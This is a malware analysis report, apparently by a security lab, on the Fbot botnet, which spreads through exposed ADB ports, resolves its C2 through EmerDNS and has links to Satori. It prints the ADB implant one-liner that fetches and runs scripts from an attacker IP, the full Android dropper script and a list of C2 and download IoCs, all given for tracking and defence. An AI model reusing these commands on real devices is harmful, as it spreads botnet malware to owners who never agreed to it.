Fbot, A Satori Related Botnet Using Block-chain DNS System

Since 2018-09-13 11:30 UTC, a new botnet (we call it Fbot) popped up in our radar which really caught our attention.

There are 3 interesting aspects about this new botnet:

  • First, so far the only purpose of this botnet looks to be just going after and removing another botnet com.ufo.miner.
  • Second, the bot does not use traditional DNS to communicate with the C2, instead, it utilizes block-chain DNS to resolve the non-stand C2 name musl.lib. (see below for details)
  • Third, this bot appears to have strong links to the original satori botnet(see below for details)

com.ufo.miner is a malware variant of ADB.Miner crypto-mining family targeting adb(Android Debug Bridge). We first reported ADB.Miner on our blog this February. And since then, this botnet family have infected a variety of equipment such as Amazon FireTV.

Analysis

Fbot spreads using the same mechanism used by earlier ADB.Miner.

The implant payload downloads and executes one of the following two scripts:

  • hxxp://188.209.52.142/c
  • or hxxp://188.209.52.142/w

These two scripts are almost the same, with a very minor difference, just one uses wget, and one uses curl. The function of the script:

  • Download the core payload malware fbot.{arch} from 188.209.52.142, within which embed the C2 musl.lib .
  • Uninstall com.ufo.miner
  • Self-cleaning

The fbot.{arch} is a Mirai variant. Its features include:

  • C2: a blockchain Domain musl.lib on port 7000, current EmerDNS resolves it to 66.42.57.45, SINGAPORE/SG Singapore
  • Scan and propagate: Scans port TCP 5555 for ADB service, and asks victims to download hxxp://188.209.52.142/c using adb interface.
  • House clean: The sample looks for and kills specific processes under the /proc/pid/exe directory, such as SMI, Xig, rig, and so on.

This variant still keeps the DDoS module from Mirai, but we have not logged any DDoS attack command from C2 till now.

The C2 in the fbot.{arch}:

The scanning and implanting payload:

shell:cd /data/local/tmp/; busybox wget hxxp://188.209.52.142/w -O -> w; sh w; rm w; curl http://188.209.52.142/c > c; sh c; rm c

The process list to be killed:

/data/local/tmp/smi
/data/local/tmp/xig
/data/local/tmp/trinity
/data/local/tmp/z
/data/local/tmp/log
/data/local/tmp/rig
/data/local/tmp/.f
/data/local/tmp/tyg

The C2 musl.lib

The C2 domain musl.lib is not a standard DNS domain name. Its top-level domain .lib is NOT registered to ICANN and cannot be resolute by the traditional DNS system.

This domain name is resolved by EmerDNS, Emercoin.com’s blockchain-based DNS system. According to its web site, it is built on block-chain technology and is fully decentralized,

There are several options when users want to access a .lib web site:

  • Through OpenNIC, which relays the dns requests between users and the EmerDNS system.
  • user can install a specific extension to the browser
  • user can set up a Emer node himself

Fbot hardcodes a list of OpenNic DNS server IP addresses. The hard-coded servers are at least the following:

176.126.70.119
163.53.248.170
174.138.48.29
5.132.191.104
107.172.42.186
163.172.168.171
174.138.48.29
185.208.208.141
163.53.248.170
5.132.191.104

Currently the EmerDNS resolution of musl.lib is as follows:

https://explorer.emercoin.com/nvs//musl.lib//25/1/1

Readers can use the following commands to reproduce the resolution process:

user@netlab.360.com$dig musl.lib @seed2.emercoin.com +short
66.42.57.45

The choice of Fbot using EmerDNS other than traditional DNS is pretty interesting, it raised the bar for security researcher to find and track the botnet (Security systems will fail if they only look for traditional DNS names), also it make it harder to sinkhole the C2 domain, at least not applicable for a ICANN members.

The Relationship between Fbot and Satori

The following diagram shows the relationship between the Fbot and the Satori botnet:

In the figure above:

  • Fbot C2 IP right now is 66.42.57.45, which resolves to 4eouhp79tl5zqs2tbqee.ukrainianhorseriding.com, and ukrainianhorseriding.com’s registration email is village@riseup.net.
  • village@riseup.net also owns rippr.cc, which is the C2 for the Satori botnet

IP 27.102.115.44 is also connected to Fbot.

  • Via the domain name 4eouhp79tl5zqs2tbqee.ukrainianhorseriding.com
  • The URL pattern on the IP is consistent with the URL pattern of the Fbot download server 188.209.52.142, see IoC at the end of the article for more detail

With all these, we think all the domain names, IPs, URLs and samples presented in the figure form a strongly inter-connected cluster, Fbot has very stong link with Satori

Contact Us

Readers can reach us on our twitter, WeChat 360Netlab or email to netlab at 360 dot cn.

IoC

Download Server

188.209.52.142 Netherlands/NL	AS49349

C2 Server

musl.lib         #C2 domain, resolved by EmerDNS, a block-chain DNS
musl.lib:7000 currently resolves to 66.42.57.457000 #Singapore/SG Singapore  #Current C2 IP and port
ukrainianhorseriding.com #Related C2 domain
27.102.115.44    Republic of Korea/KR    AS45996 #Related C2 IP
rippr.cc         #Related domain, a Satori C2

Downloading URL

hxxp://188.209.52.142/c          #Script, will download and execute fbot.{arch}, uninstall com.ufo.miner, and do clean work
hxxp://188.209.52.142/w          #Script, will download and execute fbot.{arch}, uninstall com.ufo.miner, and do clean work
hxxp://188.209.52.142/fbot.aarch64     #Scanners, will spread itself in a worm style
hxxp://188.209.52.142/fbot.arm7
hxxp://188.209.52.142/fbot.mips
hxxp://188.209.52.142/fbot.mipsel
hxxp://188.209.52.142/fbot.x86
hxxp://188.209.52.142/fbot.x86_64
hxxp://27.102.115.44/c          #历史关联脚本
hxxp://27.102.115.44/w
hxxp://27.102.115.44/mipsel.bot.le
hxxp://27.102.115.44/mips.bot.be
hxxp://27.102.115.44/i686.bot.le
hxxp://27.102.115.44/arm7.bot.le
hxxp://27.102.115.44/arm64.bot.le
hxxp://27.102.115.44/x86_64.bot.le
hxxp://27.102.115.44/adbs
hxxp://27.102.115.44/adbs2
hxxp://27.102.115.44/

One of the Scripts

#!/system/bin/sh

n="arm7 mipsel mips x86 x86_64 aarch64"
http_server="188.209.52.142"

for i in $n
do
    cp /system/bin/sh fbot.$i
    >fbot.$i
    curl hxxp://$http_server/fbot.$i > fbot.$i   #    wget hxxp://$http_server/fbot.$i > fbot.$i
    chmod 777 fbot.$i
    ./fbot.$i
    rm fbot.$i
done

# Cleanup
for i in $n
do
    rm fbot.$i
done

pm uninstall com.ufo.miner

# Suicide
rm $0